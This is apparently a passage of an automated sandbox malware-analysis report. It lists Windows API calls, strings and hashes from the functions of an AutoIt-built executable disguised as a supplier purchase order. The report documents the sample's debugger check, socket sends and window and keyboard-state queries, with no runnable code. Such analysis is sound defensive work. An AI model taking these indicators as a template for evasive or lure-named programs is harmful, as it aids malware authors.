                                                                                                                                  • _free.LIBCMT ref: 00EEC45E
                                                                                                                                    • Part of subcall function 00EC28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28DE
                                                                                                                                    • Part of subcall function 00EC28CA: GetLastError.KERNEL32(00000000,?,00EC8715,00000000,00EC88A3,00EC4673,?), ref: 00EC28F0
                                                                                                                                  • _free.LIBCMT ref: 00EEC46F
                                                                                                                                  • _free.LIBCMT ref: 00EEC481
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CALL
                                                                                                                                  • API String ID: 0-4196123274
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID: EA06
                                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _wcscmp
                                                                                                                                  • String ID: 0.0.0.0
                                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00F13CF1
                                                                                                                                    • Part of subcall function 00EA31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00EA31DA
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetMalloc.SHELL32(1<), ref: 00EA3A7D
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetDesktopFolder.SHELL32(?), ref: 00EA3A8F
                                                                                                                                    • Part of subcall function 00EA3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00EA3AD2
                                                                                                                                    • Part of subcall function 00EA3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00F622E8,?), ref: 00EA3B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                  • String ID: X
                                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                                  Strings
                                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F134AA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00EF8074
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00EF807A
                                                                                                                                    • Part of subcall function 00EF6B19: GetWindowRect.USER32(?,?), ref: 00EF6B2C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1066937146-0
                                                                                                                                  APIs
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00F1DB31
                                                                                                                                  • IsWindow.USER32(00000000), ref: 00F1DB6B
                                                                                                                                    • Part of subcall function 00EA1F04: GetForegroundWindow.USER32 ref: 00EA1FBE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Foreground
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 62970417-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDE344
                                                                                                                                  • _strlen.LIBCMT ref: 00EDE34F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout_strlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2777139624-0
                                                                                                                                  APIs
                                                                                                                                  • 745EC8D0.UXTHEME ref: 00EA36E6
                                                                                                                                    • Part of subcall function 00EC2025: __lock.LIBCMT ref: 00EC202B
                                                                                                                                    • Part of subcall function 00EA32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00EA32F6
                                                                                                                                    • Part of subcall function 00EA32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00EA330B
                                                                                                                                    • Part of subcall function 00EA374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00EA376D
                                                                                                                                    • Part of subcall function 00EA374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00EA377F
                                                                                                                                    • Part of subcall function 00EA374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00000104,?,00F61120,C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe,00F61124,?,?), ref: 00EA37EE
                                                                                                                                    • Part of subcall function 00EA374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00EA3860
                                                                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00EA3726
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3809921791-0
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00EA4C2B,?,?,?,?,00EABE63), ref: 00EA4BB6
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00EA4C2B,?,?,?,?,00EABE63), ref: 00F14972
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF282
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EEAEA5,?,?,00000000,00000008), ref: 00EBF2A6
                                                                                                                                    • Part of subcall function 00EBF2D0: _memmove.LIBCMT ref: 00EBF307
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033907384-0
                                                                                                                                  APIs
                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 00ECF7D9
                                                                                                                                  • __close_nolock.LIBCMT ref: 00ECF7F2
                                                                                                                                    • Part of subcall function 00EC886A: __getptd_noexit.LIBCMT ref: 00EC886A
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1046115767-0
                                                                                                                                  APIs
                                                                                                                                  • send.WS2_32(00000000,?,00000000,00000000), ref: 00EF9534
                                                                                                                                  • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00EF9557
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1802528911-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EC889E: __getptd_noexit.LIBCMT ref: 00EC889E
                                                                                                                                  • __lock_file.LIBCMT ref: 00EC42B9
                                                                                                                                    • Part of subcall function 00EC5A9F: __lock.LIBCMT ref: 00EC5AC2
                                                                                                                                  • __fclose_nolock.LIBCMT ref: 00EC42C4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2800547568-0
                                                                                                                                  APIs
                                                                                                                                  • timeGetTime.WINMM ref: 00EBF57A
                                                                                                                                    • Part of subcall function 00EAE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EAE279
                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00F175D3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1792118007-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00EA4F8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: select
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1274211008-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00EA3F90
                                                                                                                                    • Part of subcall function 00EC4129: __wfsopen.LIBCMT ref: 00EC4134
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00EA34E2,?,00000001), ref: 00EA3FCD
                                                                                                                                    • Part of subcall function 00EA3E78: FreeLibrary.KERNEL32(00000000), ref: 00EA3EAB
                                                                                                                                    • Part of subcall function 00EA4010: _memmove.LIBCMT ref: 00EA405A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1396898556-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00EA4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00EA4CF7
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileRead
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4104443479-0
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00EF95C9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Startup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00EA34E2,?,00000001), ref: 00EA3E6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00EE7A11
                                                                                                                                    • Part of subcall function 00EA7E53: _memmove.LIBCMT ref: 00EA7EB9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3334745507-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00EE685E,?,?,?,00F14A5C,00F3E448,00000003,?,?), ref: 00EE66E2
                                                                                                                                  • WriteFile.KERNEL32(?,?,00F622E8,00000000,00000000,?,?,?,00F14A5C,00F3E448,00000003,?,?,00EA4C44,?,?), ref: 00EE686C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$PointerWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 539440098-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendTimeout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1599653421-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EA193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA1952
                                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDE3AA
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1777923405-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: TextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                  APIs
                                                                                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,00F149DA,?,?,00000000), ref: 00EA4FC4
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FilePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wfsopen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 197181222-0
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00EA50BE,?,00EA5088,?,00EABE3D,00F622E8,?,00000000,?,00EA3E2E,?,00000000,?), ref: 00EA510C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EBAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00EBAF8E
                                                                                                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 00F0F64E
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0F6AD
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0F6EA
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0F711
                                                                                                                                  • SendMessageW.USER32 ref: 00F0F737
                                                                                                                                  • _wcsncpy.LIBCMT ref: 00F0F7A3
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00F0F7C4
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 00F0F7D1
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0F7E7
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00F0F7F1
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0F820
                                                                                                                                  • SendMessageW.USER32 ref: 00F0F843
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,00F0DE69), ref: 00F0F940
                                                                                                                                  • SetCapture.USER32(?), ref: 00F0F970
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0F9D4
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00F0F9FA
                                                                                                                                  • ReleaseCapture.USER32 ref: 00F0FA05
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0FA3A
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00F0FA47
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0FAA9
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FAD3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0FB12
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FB3D
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0FB55
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0FB60
                                                                                                                                  • GetCursorPos.USER32(?), ref: 00F0FB81
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00F0FB8E
                                                                                                                                  • GetParent.USER32(?), ref: 00F0FBAA
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0FC10
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FC40
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0FC96
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0FCC2
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0FCEA
                                                                                                                                  • SendMessageW.USER32 ref: 00F0FD0D
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0FD57
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0FD87
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F0FE1C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 3461372671-4164748364
                                                                                                                                  • Opcode ID: 06174ac3ef4ff23e32eeeec922c7ea75c494db69e79b3404a48e794ec8ce8f4e
                                                                                                                                  • Instruction ID: d030cbe7c25341837763d23f1cf09f34858ba82dae0471ce3b674907b733b1ae
                                                                                                                                  • Opcode Fuzzy Hash: 06174ac3ef4ff23e32eeeec922c7ea75c494db69e79b3404a48e794ec8ce8f4e
                                                                                                                                  • Instruction Fuzzy Hash: 3932BD71604205AFDB20DF64C884AAABBE9FF48324F180529F656876F1C771EC49FB51
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0AFDB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                  • Opcode ID: 7430eccd9ffa3291fb1b4fabdc0c356fa840fc84bb6477a3e03f647823c6bf64
                                                                                                                                  • Instruction ID: 594ccc5eaf4eb84a95eac5b0a419301adceb02323197880d958b6c1a04ad5e38
                                                                                                                                  • Opcode Fuzzy Hash: 7430eccd9ffa3291fb1b4fabdc0c356fa840fc84bb6477a3e03f647823c6bf64
                                                                                                                                  • Instruction Fuzzy Hash: 6E12DEB1A00309ABEB258F64CD49FAE7BF9EF85320F144219F515AB2D0DB748942EB51
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 00EBF796
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F14388
                                                                                                                                  • IsIconic.USER32(000000FF), ref: 00F14391
                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 00F1439E
